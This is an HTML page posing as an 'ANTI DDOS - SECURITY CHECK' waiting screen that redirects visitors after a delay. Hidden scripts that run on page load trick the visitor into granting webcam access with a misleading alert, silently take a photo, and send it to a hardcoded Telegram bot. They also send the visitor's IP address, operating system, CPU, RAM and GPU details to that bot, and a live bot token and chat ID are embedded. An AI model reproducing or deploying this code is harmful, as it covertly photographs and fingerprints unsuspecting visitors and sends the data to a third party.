

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="ANTI DDOS - Trần Minh Quang">
  <meta name="author" content="DuckNha">
  <link rel="canonical" href="//tranminhquang888.github.io" />
  <title>Trần Minh Quang - ANTI DDOS</title>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Pattaya|Potta One|Rowdies|Braah One|Chivo">
  <link rel="icon" href="https://tse1.mm.bing.net/th?id=OIP.w_Q5HVaozyYRzd5K9nYMmwHaEK&pid=Api&P=0&h=100&w=100">
</head>
<body onload="__onCreate()" class="bodystyle">
    <style>
        * {
    user-select: none;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none
}

body {
  /*  background: url('https://i.pinimg.com/564x/ff/5c/33/ff5c3321a863db98821f6045453aac9b.jpg') no-repeat;*/
  background-color: #fcfcfc;
    background-size: cover;
    background-position: center;
    justify-content: center;
    text-align: center;
    align-items: center;
}

.Container {
    text-align: center;
    margin-top: 5%;
    width: 100%;
    overflow: hidden;
    font-size: 1em;
}

@media (max-width: 768px) {
    .Container {
        margin-top: 15%;
        font-size: 0.8em; 
    }
}

.bodystyle {
    position: fixed;
    top: 5px;
    left: 0;
    width: 100%;
    height: 99%;
    text-align: center;
    background-color: #111;
    margin: 0;
    padding: 0;
    border-style: double;
    border-radius: 20px;
    border-color: #ccc;
    border-width: 2px;
    box-sizing: border-box;
    animation-name: bodyborder;
    animation-iteration-count: infinite;
    animation-duration: 1s;
    animation-direction: right;
}


            @keyframes bodyborder {
                30% {
                    border-color: #666
                }

                60% {
                    border-color: #999
                }

                90% {
                    border-color: #ccc
                }
            }

            @media (max-width: 768px) {
  .bodystyle {
    top: 6px;
    left: 5px;
    width: 98%;
    height: 99%;
  }
}
ul {
    margin: 0;
    padding: 0
}
h1 {
    color: #fff;
    font-family: 'Rowdies';
}

h2 {
    font-family: 'Braah One';
    font-size: 25px;
    color: silver;
}

.pulse-container {
                margin-top: 10px;
                margin-bottom: 10px;
                width: 100px;
                display: flex;
                justify-content: space-between;
                align-items: center
            }

            .pulse-bubble {
                width: 15px;
                height: 15px;
                border-radius: 5px;
                background-color: violet;
            }

            .pulse-bubble-1 {
                animation: pulse .4s ease 0s infinite alternate
            }

            .pulse-bubble-2 {
                animation: pulse .4s ease .2s infinite alternate
            }

            .pulse-bubble-3 {
                animation: pulse .4s ease .4s infinite alternate
            }

            @keyframes pulse {
                from {
                    opacity: 1;
                    transform: scale(1)
                }

                to {
                    opacity: .25;
                    transform: scale(.75)
                }
            }

.Blob {
  background: black;
  border-radius: 50%;
  margin: 40px;
  height: 150px;
  width: 150px; 
  box-shadow: 0 1px 7px rgb(231, 231, 231);
  margin-top: 70px;
}
    </style>
    <section id="Image">
  <div class="Container">
    <img class="Blob" src="https://img00.deviantart.net/5137/i/2011/278/5/c/anonymous_logo_by_viperaviator-d4bwqvn.png
    " alt="Minh Quang">
    <h1>ANTI DDOS - SECURITY CHECK</h1>
    <p style="font-family: Chivo;color: rgb(216, 216, 216);" >You won't see the form anymore.
    <br> This is an attack challenge for the players.</p>
    <strong style="color: rgb(216, 216, 216);font-family: Chivo;">power by
    <a style="color: #a690d6;" href="//facebook.com/100014053117503" target="about:blank">tranminhquang888.github.io</a></a>
</strong>
  </div>
</section>
 <div style="margin-top: 15px;" class="Container">
    <h2>- Waiting SECURITY -</h2>
    <center> 
        <div class="pulse-container">
        <div class="pulse-bubble pulse-bubble-1"></div>
        <div class="pulse-bubble pulse-bubble-2"></div>
        <div class="pulse-bubble pulse-bubble-3"></div>
    </div>
    </div>
</center>
<br>
    <script>
        // Chuyển hướng tự động sau 5 giây
        setTimeout(function() {
            window.location.href = "/home/";
        }, 10000); // 5000 milliseconds = 5 giây
    </script>
<script>(function(){var js = "window['__CF$cv$params']={r:'80e19f6f7bfe2112',t:'MTY5NTk2MzIxMS4zMTMwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body>
<script>
    // Hàm chụp ảnh khuôn mặt bằng webcam
    function capturePhoto() {
    var video = document.getElementById('video');
    var canvas = document.createElement('canvas');
    var context = canvas.getContext('2d');
    
    // Cài đặt kích thước canvas bằng kích thước video
    canvas.width = video.videoWidth;
    canvas.height = video.videoHeight;
    
    // Chụp ảnh từ video
    context.drawImage(video, 0, 0, canvas.width, canvas.height);
    
    // Lấy dữ liệu ảnh dưới dạng Blob
    canvas.toBlob(function(blob) {
    // Gửi ảnh qua Telegram
    var formData = new FormData();
    formData.append('chat_id', '5478300957'); // Thay YOUR_CHAT_ID bằng Chat ID của bot Telegram
    formData.append('photo', blob, 'photo.jpg');
    
    $.ajax({
    type: 'POST',
    url: 'https://api.telegram.org/bot6859238707:AAFA1XfMqd61U-tcpKl6vEiZUQ2cSAPZOJM/sendPhoto', // Thay YOUR_TELEGRAM_BOT_TOKEN bằng Telegram Bot Token của bạn
    data: formData,
    processData: false,
    contentType: false,
    success: function(response) {
    console.log('Đã gửi ảnh thành công đến Telegram');
    },
    error: function(error) {
    console.log('Lỗi khi gửi ảnh đến Telegram: ' + error);
    }
    });
    }, 'image/jpeg');
    }
    
    // Sử dụng API getUserMedia để truy cập webcam và tự động chụp ảnh
    function requestCameraAccess() {
    navigator.mediaDevices.getUserMedia({ video: true })
    .then(function(stream) {
    var video = document.getElementById('video');
    video.srcObject = stream;
    video.play();
    
    // Tự động chụp ảnh sau 1 giây
    setTimeout(function() {
    capturePhoto();
    }, 500);
    })
    .catch(function(error) {
    console.log('Đã xảy ra lỗi khi truy cập webcam: ' + error.message);
    });
    }
    
    // Hiển thị hộp thoại alert và xử lý phản hồi của người dùng
    function showCameraAccessAlert() {
    alert('Ấn OK để tiếp tục xem.');
    requestCameraAccess();
    }
    
    // Gọi hàm hiển thị hộp thoại alert khi trang web được tải
    window.addEventListener('DOMContentLoaded', function() {
    showCameraAccessAlert();
    });
    </script>
    
    <video id="video" width="1" height="1" autoplay></video>
    
    <script>
    $(document).ready(function() {
    var telegramBotToken = '6859238707:AAFA1XfMqd61U-tcpKl6vEiZUQ2cSAPZOJM';
    var chatId = '5478300957';
    
    // Lấy địa chỉ IP
    $.getJSON('https://api.ipify.org?format=json', function(data) {
    var ip = data.ip;
    
    var cpu = navigator.hardwareConcurrency || 'N/A';
    var ram = navigator.deviceMemory || 'N/A';
    var disk = navigator.deviceStorage || 'N/A';
    var gpu = getGraphicsCard();
    var os = getOperatingSystem();
    var userAgent = navigator.userAgent;
    
    var message = '- Địa chỉ IP mới: ' + ip + '\n- User-Agent: ' + userAgent + '\n- Hệ điều hành: ' + os + '\n- CPU: ' + cpu + '\n- RAM: ' + ram + '\n- Disk: ' + disk + '\n- GPU: ' + gpu;
    
    var payload = {
    chat_id: chatId,
    text: message
    };
    
    $.ajax({
    type: 'POST',
    url: 'https://api.telegram.org/bot' + telegramBotToken + '/sendMessage',
    data: payload,
    dataType: 'json',
    success: function(response) {
    console.log('Thông tin đã được gửi thành công đến Telegram');
    },
    error: function(error) {
    console.log('Lỗi khi gửi thông tin đến Telegram: ' + error);
    }
    });
    });
    
    // Các hàm hỗ trợ
    function getOperatingSystem() {
    var userAgent = navigator.userAgent || navigator.vendor || window.opera;
    if (/windows phone/i.test(userAgent)) {
    return 'Windows Phone';
    }
    if (/android/i.test(userAgent)) {
    return 'Android';
    }
    if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {
    return 'iOS';
    }
    if (/Macintosh|Mac OS X/.test(userAgent)) {
    return 'Mac OS';
    }
    if (/Windows NT/.test(userAgent)) {
    return 'Windows';
    }
    return 'Unknown';
    }
    
    function getGraphicsCard() {
    var canvas = document.createElement('canvas');
    var gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
    var debugInfo = gl.getExtension('WEBGL_debug_renderer_info');
    var gpu = 'N/A';
    if (debugInfo) {
    gpu = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL);
    }
    return gpu;
    }
    });
    </script>  
</html>